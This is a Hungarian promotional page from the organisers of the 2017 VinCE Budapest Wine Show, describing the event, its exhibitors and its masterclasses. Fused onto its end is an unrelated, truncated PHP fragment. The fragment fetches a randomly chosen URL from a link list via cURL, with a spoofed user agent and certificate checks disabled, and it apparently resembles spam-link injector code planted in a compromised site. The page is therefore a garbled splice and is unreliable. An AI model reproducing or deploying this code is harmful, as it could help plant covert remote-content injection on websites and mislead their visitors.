-->

A szervezők


A VinCE Budapest Wine Show különleges esemény. Nagyszerű érzés végigsétálni a Corinthia pompás termeiben, és látni az ország legjobb borászait, amint személyesen kóstoltatják legújabb kincseiket. Kicsit arrébb angol, francia vagy éppen kínai beszéd hallatszik, Master of Wine és más szakértők vitatják meg a kóstolt tételeket. Az előadóteremben felharsan a taps, épp egy olasz vagy francia csúcsborászat mutatta meg különlegességeit. Kedves kiállítók, kedves vendégek, elárulom, hogy a VinCE Budapest Wine Show-t megszervezni ugyanannyira izgalmas. Páratlan érzés megpillantani egy várva várt e-mailt, és pótolhatatlan a pillanat, amikor egy előadó többévnyi levelezés és rábeszélés után végre igent mond. Igaz, egyre ismertebbek vagyunk, egyre többen hallották a VinCE nevét szerte a világban, ami egyrészt könnyebbség, hiszen már nem kell mindenkinek bizonygatni, hogy a VinCE Budapest „megér egy misét”, másrészt viszont felelősség, hiszen a jó hírünknek meg is kell felelni, ami továbbra is szakadatlan munkát jelent. Külön kihívás, hogy az ember természeténél fogva elvárja a megszokott jót, és ha igazán nagyszerűt akarunk alkotni, akkor mindig felül kell múlni a megszokottat, hozzá kell tenni valamit a korábbihoz, vagyis évről évre meg kell újulnunk, figyelme a szakma és a közönség igényét. 2017 márciusában egy igazi különlegességgel készülünk: a legnagyobb titkok mélyére engedünk bepillantást, hogy vendégeink is részesei lehessenek a borok izgalmas kulisszatitkainak.

Üdvözlettel és a március 17–19-i találkozás reményében:
Németh Ágnes
VinCE Budapest nemzetközi tanácsadó – szervező

A VinCE Budapestre mindenkinek el kell jönnie! Aki borász, azért hogy találkozzon több mint 200 magyar és külföldi borszakíróval és kereskedővel, aki pedig komolyan érdeklődik a borok iránt annak azért, hogy a 15  nemzetközi mesterkurzus közül megtalálja az érdeklődési körének legmegfelelőbbet. Aki pedig csak kóstolni szereti a bort mélyebb filozofálgatások nélkül, annak ott van a több, mint 1000 bort felvonultató 160 pincészete exkluzív környezetben, ahol kedvére hasonlíthatja össze a termelőket, régiókat vagy akár az országokat egymással. Egyszóval, bármilyen vonalon is kötődik az ember a borhoz, a VinCE Budapestet nem lehet kihagyni. Én is ott leszek.

Jandrasics Borbála

 VinCE Budapest szervező


html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>